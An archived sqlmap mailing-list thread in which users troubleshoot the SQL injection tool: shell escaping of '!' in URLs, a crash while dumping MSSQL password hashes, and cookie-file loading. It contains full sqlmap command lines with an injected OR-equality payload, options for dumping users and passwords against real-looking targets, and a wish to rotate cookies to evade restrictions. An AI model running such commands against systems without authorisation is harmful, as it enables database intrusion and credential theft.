Re: [sqlmap-users] sqlmap-user event not found error
From: Miroslav S. <mir...@gm...> - 2014-05-11 14:39:18
Hi Bob.

Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...)

Kind regards,
Miroslav Stampar

On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:

> Hi friend,
>
> I have problem with ! inside URL .
>
> /sqlmap.py -u
> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
> bash: !search.do?keyword=: event not found
>
> How should i do ?
>
> thanks
>
> bob
> ------------------
>
> ------------------ Original ------------------
> *From: * "Miroslav Stampar";<mir...@gm...>;
> *Date: * Fri, May 31, 2013 03:00 AM
> *To: * "Bob"<sto...@qq...>;
> *Cc: * "sqlmap-users"<sql...@li...>;
> *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
>
> Hi.
> Have you been able to retrieve user names normally? I mean, were they
> normally been displayed in console output?
> Also, is boolean technique the only one detected by sqlmap in your case
> (or maybe UNION)?
> Kind regards,
> Miroslav Stampar
>
>
> On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:
>
>> Hi friend,
>>
>>
>> Could you help me with this bug ?
>>
>>
>> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
>> run with the latest development version from the GitHub repository. If the
>> exception persists, please send by e-mail to '
>> sql...@li...' or open a new issue at '
>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>> text and any information required to reproduce the bug. The developers will
>> try to reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 1.0-dev
>> Python version: 2.7.3
>> Operating system: posix
>> Command line: ./sqlmap -u ***********************************************
>> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
>> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft SQL Server --users --passwords
>> Technique: BOOLEAN
>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>> Traceback (most recent call last):
>>   File "./sqlmap", line 87, in main
>>     start()
>>   File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
>>     action()
>>   File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
>>     conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
>>   File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in getPasswordHashes
>>     if user in retrievedUsers:
>> TypeError: unhashable type: 'list'
>>
>> [*] shutting down at 22:54:12
>> Thanks
>>
>> BOB
>>
>>
>> ------------------ Original ------------------
>> *From: * "sqlmap-users-request"<sql...@li...>;
>> *Date: * May 29, 2013
>> *To: * "sqlmap-users"<sql...@li...>;
>> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>>
>> Send sqlmap-users mailing list submissions to
>> sql...@li...
>>
>> To subscribe or unsubscribe via the World Wide Web, visit
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> or, via email, send a message with subject or body 'help' to
>> sql...@li...
>>
>> You can reach the person managing the list at
>> sql...@li...
>>
>> When replying, please edit your Subject line so it is more specific
>> than "Re: Contents of sqlmap-users digest..."
>>
>>
>> Today's Topics:
>>
>> 1. Re: Feature request (David Guimaraes)
>> 2. Re: --load-cookies (Dirk Wetter)
>> 3. Re: --load-cookies (Miroslav Stampar)
>> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem (Miroslav Stampar)
>> 5. Re: --load-cookies (Dirk Wetter)
>> 6. --host parameter (co...@5i...)
>> 7. Sqlmap and direct connect error (???????? ??????)
>> 8. Re: --host parameter (Miroslav Stampar)
>> 9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>> 10. feature request: offline mode for --dns-domain? (buawig)
>> 11. feature request: --dns-domain for non-root users (--dns-port) (buawig)
>> 12. Domain credentials (Brian Milliron)
>> 13. Re: Domain credentials (Brandon Perry)
>> 14. Re: feature request: offline mode for --dns-domain? (Miroslav Stampar)
>> 15. Re: Domain credentials (Miroslav Stampar)
>> 16. Re: feature request: fetch DNS queries from DNS server via HTTP (buawig)
>> 17. Re: feature request: fetch DNS queries from DNS server via HTTP (Miroslav Stampar)
>> 18. MySQL error based technique bug (Konrads Smelkovs)
>> 19. Re: MySQL error based technique bug (Miroslav Stampar)
>> 20. SQLmap crashing (Phillip Wylie)
>> 21. Re: SQLmap crashing (Miroslav Stampar)
>> 22. Custom injection payload in POST (Marcell Fodor)
>> 23. Re: SQLmap crashing (Miroslav Stampar)
>> 24. I got error on windows (warezhacking)
>> 25. Appending to a dump (Stephen Shkardoon)
>> 26. Re: Appending to a dump (Miroslav Stampar)
>> 27. Re: Appending to a dump (Stephen Shkardoon)
>> 28. Re: Appending to a dump (Miroslav Stampar)
>> 29. --ignore-404 ? (buawig)
>> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (buawig)
>> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (Miroslav Stampar)
>> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (Miroslav Stampar)
>> 33. Re: --ignore-404 ? (Miroslav Stampar)
>> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>> 35. Re: BUG...!!!! o.O (Miroslav Stampar)
>> 36. gun...@gm... wants to follow you. Accept? (gun...@gm...)
>> 37. Direct access to mysql database (Marcell Fodor)
>> 38. Re: Direct access to mysql database (Miroslav Stampar)
>> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio... (Badoo)
>> 40. Not getting any sensitive data from database (Marcell Fodor)
>> 41. Re: Not getting any sensitive data from database (Miroslav Stampar)
>> 42. unhandled exception (kvasilopoulos)
>> 43. [SQLMAP] Unhandled exception for IPv6 (e.n...@st...)
>> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>> 45. Re: unhandled exception (Miroslav Stampar)
>> 46. Passing SOAPAction in --header (Brandon Perry)
>> 47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>> 49. Blind SQL Injection question (Guy Dufour)
>> 50. Re: Blind SQL Injection question (Chris Oakley)
>> 51. Re: Passing SOAPAction in --header (Brandon Perry)
>> 52. Re: Passing SOAPAction in --header (Brandon Perry)
>> 53. Deploy&Create SSH/tunnel with compromised MSSQL server (Alok Kumar)
>> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Brandon Perry)
>> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Alok Kumar)
>> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Brandon Perry)
>> 57. SQLMAP Bug (Joe O'Hara)
>> 58. Re: SQLMAP Bug (Miroslav Stampar)
>> 59. [CRITICAL] (Thai Thao)
>> 60. Re: [CRITICAL] (Miroslav Stampar)
>> 61. Providing multiple dbms (Sebastian Nerz)
>> 62. Re: Providing multiple dbms (Miroslav Stampar)
>>
>>
>> ----------------------------------------------------------------------
>>
>> Message: 1
>> Date: Sat, 13 Apr 2013 21:40:39 -0300
>> From: David Guimaraes <sk...@gm...>
>> Subject: Re: [sqlmap-users] Feature request
>> To: Miroslav Stampar <mir...@gm...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID:
>> <CAJ...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Good question Miroslav.. I tried to think in something that can be
>> implemented without ruin sqlmap query schema, but I could not come to any
>> conclusion... =(
>>
>> The thing is, sqlsus use a different approch to dump the data, making this
>> kind of thing possible...
>>
>> The solution that I found in this particular scenario is to use sqlsus,
>> unfortunately...
>>
>> Regards.
>>
>> David
>>
>>
>> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>>
>> > Hi David.
>> >
>> > And what do you recommend to be done in case of query with length >
>> > max_inj_length?
>> >
>> > Kind regards,
>> > Miroslav Stampar
>> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>> >
>> >> Hi, I am trying to perform sql injection on a web site but I can not get
>> >> successful due to a size limitation on the query sent to the server. The
>> >> server is limiting the size of query in 512 bytes only and sqlmap do not
>> >> have any customization that allows me to bypass this restriction like
>> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called "autoconf"
>> >> that measure the permited query size.
>> >>
>> >> There is some chance to put this kind of feature in sqlmap?
>> >>
>> >> Thanks.
>> >>
>> >> --
>> >> David Gomes Guimarães
>> >>
>> >> ------------------------------------------------------------------------------
>> >> Own the Future-Intel® Level Up Game Demo Contest 2013
>> >> Rise to greatness in Intel's independent game demo contest.
>> >> Compete for recognition, cash, and the chance to get your game
>> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>>
>> --
>> David Gomes Guimarães
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 2
>> Date: Mon, 15 Apr 2013 11:36:37 +0200
>> From: Dirk Wetter <sp...@dr...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Miroslav Stampar <mir...@gm...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID: <516...@dr...>
>> Content-Type: text/plain; charset=ISO-8859-1
>>
>>
>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>> > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>>
>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>> hiccups, using the same file:
>>
>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>> Traceback (most recent call last):
>>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>>     assert domain_specified == initial_dot
>> AssertionError
>>
>> _warn_unhandled_exception()
>> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
>> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>
>> the 999.. looks strange to me.
>>
>> >
>> >
>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
>> >
>> > Hi Dirk.
>> >
>> > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>> >
>>
>> that's true but IMO 0 represents just a session cookie. Example:
>>
>> prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
>> # HTTP cookie file.
>> # Generated by Wget on 2013-04-15 11:23:13.
>> # Edit at your own risk.
>>
>> .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>> .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>> .bing.com TRUE / FALSE 0 _HOP
>> .bing.com TRUE / FALSE 0 _FS NU=1
>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>> www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>> www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>>
>> prompt%
>>
>> Same parser problem btw if I edit the cookie file and put 1429089794 unix
>> time instead of 0 in there.
>>
>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>> but cookies w/ expiration date) and uses the last
>> cookie only for the first 120 tries.
>>
>> Cheers, Dirk
>>
>>
>> >
>> > Kind regards,
>> > Miroslav Stampar
>> >
>> >
>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
>> >
>> >
>> > Hi Miroslav,
>> >
>> > thx for your prompt answer.
>> >
>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>> > > Hi Dirk.
>> > >
>> > > Could you please get the latest revision and retry it again?
>> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>> > The slight difference seems to be that in the case where I didn't supply a cookie
>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>> > >
>> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>> > >
>> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>> >
>> > sure, here you go:
>> >
>> > --snip
>> > # Netscape HTTP Cookie File
>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>> > [..]
>> > --snap
>> >
>> > They are all session cookies. For easier reading here I put some blanks in the line
>> > above, in "cookie-file" there aren't any though. Cookies were generated with
>> > stompy and a shell script (looks he same as with
>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>> >
>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>> >
>> > >
>> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>> >
>> > see above.
>> >
>> > Cheers,
>> >
>> > Dirk
>> >
>> > >
>> > >
>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
>> > >
>> > > Hi Miroslav,
>> > >
>> > > yes unfortunately.
>> > >
>> > > If I omit the cookie line in the request header completely, sqlmap
>> > > seems to take the first cookie issued by the server with set-cookie (and
>> > > put's it silently in).
>> > >
>> > > Cheers,
>> > >
>> > > Dirk
>> > >
>> > >
>> > >
>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>> > > > Hi.
>> > > >
>> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>> > > >
>> > > > Kind regards,
>> > > > Miroslav Stampar
>> > > >
>> > > >
>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
>> > > >
>> > > >
>> > > > Hi folks,
>> > > >
>> > > > .... that doesn't work for me. It always uses the cookie supplied
>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>> > > > from the 1st server reply is being used)
>> > > >
>> > > > So what is wrong in here:
>> > > >
>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>> > > > --level=2 --risk=2 -r $REQUEST
>> > > >
>> > > > The content of the file $REQUEST is:
>> > > >
>> > > > POST <URL> HTTP/1.1
>> > > > Host: <HOST>
>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
>> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> > > > Accept-Language: en-US,en;q=0.5
>> > > > Accept-Encoding: gzip, deflate
>> > > > Referer: <Referer>
>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>> > > > Connection: keep-alive
>> > > > Content-Type: application/x-www-form-urlencoded
>> > > > Content-Length: 67
>> > > >
>> > > > <abunchofpostparams>
>> > > >
>> > > >
>> > > > No hints that cookie-file is not in correct format (I've been through this,
>> > > > at least I think I so ;) ).
>> > > >
>> > > > Any insight would be much appreciated.
>> > > >
>> > > >
>> > > > Cheers,
>> > > >
>> > > > Dirk
>> > > >
>> > > >
>> > > > ------------------------------------------------------------------------------
>> > > > Precog is a next-generation analytics platform capable of advanced
>> > > > analytics on semi-structured data. The platform includes APIs for building
>> > > > apps and a phenomenal toolset for data science. Developers can use
>> > > > our toolset for easy data analysis & visualization. Get a free account!
>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > > > _______________________________________________
>> > > > sqlmap-users mailing list
>> > > > sql...@li...
>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> > > >
>> > > >
>> > > > --
>> > > > Miroslav Stampar
>> > > > http://about.me/stamparm
>> > >
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>>
>>
>> ------------------------------
>>
>> Message: 3
>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>> From: Miroslav Stampar <mir...@gm...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Dirk Wetter <sp...@dr...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID:
>> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Hi Dirk.
>>
>> Now that crash should be "patched".
>>
>> Could you please retry it now and say if the latest revision suits your
>> needs?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>>
>> >
>> >
>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>> > > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>> >
>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>> > hiccups, using the same file:
>> >
>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>> > Traceback (most recent call last):
>> >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>> >     assert domain_specified == initial_dot
>> > AssertionError
>> >
>> > _warn_unhandled_exception()
>> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
>> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>> > '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>> >
>> > the 999.. looks strange to me.
>> >
>> > >
>> > >
>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
>> > >
>> > > Hi Dirk.
>> > >
>> > > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>> > >
>> >
>> > that's true but IMO 0 represents just a session cookie. Example:
>> >
>> > prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
>> > # HTTP cookie file.
>> > # Generated by Wget on 2013-04-15 11:23:13.
>> > # Edit at your own risk.
>> >
>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
>> > .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>> > .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>> > .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>> > .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>> > .bing.com TRUE / FALSE 0 _HOP
>> > .bing.com TRUE / FALSE 0 _FS NU=1
>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>> > www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>> >
>> > prompt%
>> >
>> > Same parser problem btw if I edit the cookie file and put 1429089794 unix
>> > time instead of 0 in there.
>> >
>> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>> > but cookies w/ expiration date) and uses the last
>> > cookie only for the first 120 tries.
>> >
>> > Cheers, Dirk
>> >
>> >
>> > >
>> > > Kind regards,
>> > > Miroslav Stampar
>> > >
>> > >
>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
>> > >
>> > >
>> > > Hi Miroslav,
>> > >
>> > > thx for your prompt answer.
>> > >
>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>> > > > Hi Dirk.
>> > > >
>> > > > Could you please get the latest revision and retry it again?
>> > > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>> > > The slight difference seems to be that in the case where I didn't supply a cookie
>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>> > > >
>> > > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>> > > >
>> > > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>> > >
>> > > sure, here you go:
>> > >
>> > > --snip
>> > > # Netscape HTTP Cookie File
>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>> > > [..]
>> > > --snap
>> > >
>> > > They are all session cookies. For easier reading here I put some blanks in the line
>> > > above, in "cookie-file" there aren't any though. Cookies were generated with
>> > > stompy and a shell script (looks he same as with
>> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>> > >
>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>> > >
>> > > >
>> > > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>> > >
>> > > see above.
>> > >
>> > > Cheers,
>> > >
>> > > Dirk
>> > >
>> > > >
>> > > >
>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
>> > > >
>> > > > Hi Miroslav,
>> > > >
>> > > > yes unfortunately.
>> > > >
>> > > > If I omit the cookie line in the request header completely, sqlmap
>> > > > seems to take the first cookie issued by the server with set-cookie (and
>> > > > put's it silently in).
>> > > >
>> > > > Cheers,
>> > > >
>> > > > Dirk
>> > > >
>> > > >
>> > > >
>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>> > > > > Hi.
>> > > > >
>> > > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>> > > > >
>> > > > > Kind regards,
>> > > > > Miroslav Stampar
>> > > > >
>> > > > >
>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
>> > > > >
>> > > > >
>> > > > > Hi folks,
>> > > > >
>> > > > > .... that doesn't work for me. It always uses the cookie supplied
>> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>> > > > > from the 1st server reply is being used)
>> > > > >
>> > > > > So what is wrong in here:
>> > > > >
>> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>> > > > > --level=2 --risk=2 -r $REQUEST
>> > > > >
>> > > > > The content of the file $REQUEST is:
>> > > > >
>> > > > > POST <URL> HTTP/1.1
>> > > > > Host: <HOST>
>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
>> > > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> > > > > Accept-Language: en-US,en;q=0.5
>> > > > > Accept-Encoding: gzip, deflate
>> > > > > Referer: <Referer>
>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>> > > > > Connection: keep-alive
>> > > > > Content-Type: application/x-www-form-urlencoded
>> > > > > Content-Length: 67
>> > > > >
>> > > > > <abunchofpostparams>
>> > > > >
>> > > > >
>> > > > > No hints that cookie-file is not in correct format (I've been through this,
>> > > > > at least I think I so ;) ).
>> > > > >
>> > > > > Any insight would be much appreciated.
>> > > > >
>> > > > >
>> > > > > Cheers,
>> > > > >
>> > > > > Dirk
>> > > > >
>> > > > >
>> > > > > ------------------------------------------------------------------------------
>> > > > > Precog is a next-generation analytics platform capable of advanced
>> > > > > analytics on semi-structured data.
>> > > > > The platform includes APIs for building
>> > > > > apps and a phenomenal toolset for data science. Developers can use
>> > > > > our toolset for easy data analysis & visualization. Get a free account!
>> > > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > > > > _______________________________________________
>> > > > > sqlmap-users mailing list
>> > > > > sql...@li...
>> > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> > > > >
>> > > > >
>> > > > > --
>> > > > > Miroslav Stampar
>> > > > > http://about.me/stamparm
>> > > >
>> > > >
>> > > > --
>> > > > Miroslav Stampar
>> > > > http://about.me/stamparm
>> > >
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> > >
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> >
>> >
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 4
>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>> From: Miroslav Stampar <mir...@gm...>
>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
>> clean_filesystem
>> To: Brandon Perry <bpe...@gm...>
>> Cc: sqlmap users <sql...@li...>
>> Message-ID:
>> <CA+9yoX3RNQDm=PqT...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Hi Brandon.
>>
>> Thank you for your patch and find it now included [1].
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> [1]
>> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>
>>
>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...> wrote:
>>
>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
>> > call when self.output_directory is NoneType and clean_system() is called.
>> >
>> > --
>> > http://volatile-minds.blogspot.com -- blog
>> > http://www.volatileminds.net -- website
>> >
>> >
>> > ------------------------------------------------------------------------------
>> > Precog is a next-generation analytics platform capable of advanced
>> > analytics on semi-structured data. The platform includes APIs for building
>> > apps and a phenomenal toolset for data science. Developers can use
>> > our toolset for easy data analysis & visualization. Get a free account!
>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>> >
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 5
>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>> From: Dirk Wetter <sp...@dr...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Miroslav Stampar <mir...@gm...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID: <516...@dr...>
>> Content-Type: text/plain; charset=ISO-8859-1
>>
>> Hi Miroslav,
>>
>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>> > Hi Dirk.
>> >
>> > Now that crash should be "patched".
>> >
>> > Could you please retry it now and say if the latest revision suits your needs?
>>
>> cool, thx. Works!
>>
>> However (sorry):
>>
>> One needs to omit the cookie in the request header, otherwise it just uses the one
>> supplied by the request.
>>
>> Then: It doesn't change the cookie.
>> Maybe I was interpreting that not correctly
>> but my point was using the load-cookies option to direct sqlmap to change
>> cookies once in a while (whenever that's gonna be). This is to circumvent
>> restrictions one can encounter otherwise....
>>
>> Cheers,
>>
>> Dirk
>>
>>
>> >
>> > Kind regards,
>> > Miroslav Stampar
>> >
>> >
>> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>> >
>> >
>> >
>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>> > > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>> >
>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>> >
